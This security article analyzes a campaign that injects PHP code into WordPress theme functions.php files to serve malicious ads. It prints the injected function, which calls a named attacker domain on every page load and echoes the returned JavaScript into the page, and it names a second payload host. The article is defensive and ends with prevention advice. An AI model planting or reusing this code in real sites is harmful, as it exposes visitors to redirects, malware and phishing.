In recent months, cybercriminals have intensified their focus on WordPress websites, employing sophisticated techniques to exploit vulnerabilities and compromise site integrity. A particularly insidious method involves the silent injection of malicious PHP code into theme files, enabling attackers to serve unwanted third-party scripts without alerting site administrators or visitors.
Discovery of the Malvertising Campaign
The campaign came to light when a website owner observed unexplained script executions on their site. Upon investigation, it was revealed that attackers had appended a small block of PHP code to the active theme’s `functions.php` file. This code did not alter the visible content of the site but operated covertly, executing on every page request.
Security analysts at Sucuri identified the campaign after detecting anomalous JavaScript calls to attacker-controlled domains, which had been blocklisted by multiple security vendors. The attack primarily exploits weak file permissions and outdated themes. By gaining write access—often through compromised credentials or vulnerable plugins—hackers insert a seemingly benign function that contacts a command-and-control (C&C) server.
Mechanism of Infection
The injected PHP function is designed to execute during the `wp_head` hook, ensuring it runs before the rest of the page loads. This function establishes a POST connection to a remote endpoint at `hxxps://brazilc[.]com/ads.php`, retrieves a malicious JavaScript payload, and embeds it directly into the HTML document.
The payload performs two main actions:
1. Loading a Traffic-Distribution Script: It fetches a script from `porsasystem.com/6m9x.js`, which can redirect visitors to malicious sites or display unwanted pop-ups.
2. Injecting a Hidden Iframe: A 1×1 pixel iframe is inserted, mimicking Cloudflare’s challenge platform. This technique helps the malware evade detection by disguising malicious activity as legitimate CDN operations.
These methods enable forced redirects, pop-ups, and evasion of security scanners without raising suspicion.
Technical Details of the Injection
The infection mechanism hinges on the following PHP function injected into `functions.php`:
“`php
function ti_custom_javascript() {
$response = wp_remote_post(
‘https://brazilc.com/ads.php’,
array(‘timeout’ => 15, ‘body’ => array(‘url’ => home_url()))
);
if (!is_wp_error($response)) {
echo wp_remote_retrieve_body($response);
}
}
add_action(‘wp_head’, ‘ti_custom_javascript’);
“`
Upon each page load, this function silently executes, contacting the C&C server and printing the returned JavaScript payload into the page header.
Implications and Risks
The covert nature of this attack poses significant risks:
– User Redirection: Visitors may be redirected to malicious websites, leading to potential malware infections or phishing attempts.
– Data Theft: Attackers can intercept sensitive user information, including login credentials and personal data.
– SEO Poisoning: The injection can manipulate search engine rankings, damaging the site’s reputation and visibility.
– Resource Exploitation: Compromised sites may be used to distribute further malware or participate in larger botnet operations.
Preventive Measures
To safeguard against such attacks, website administrators should implement the following measures:
1. Regular Updates: Ensure that WordPress core, themes, and plugins are updated to their latest versions to patch known vulnerabilities.
2. Strong Credentials: Use complex, unique passwords for all administrative accounts and change them periodically.
3. File Permissions: Set appropriate file permissions to restrict unauthorized modifications to critical files.
4. Security Plugins: Install reputable security plugins that can detect and prevent unauthorized code injections.
5. Regular Scans: Conduct routine security scans to identify and address potential threats promptly.
6. Monitoring: Implement monitoring tools to detect unusual activities or unauthorized changes to the website.
Conclusion
The silent injection of malicious PHP code into WordPress theme files represents a sophisticated and stealthy method of compromising websites. By understanding the mechanisms of such attacks and implementing robust security practices, website administrators can protect their sites and users from these evolving threats.
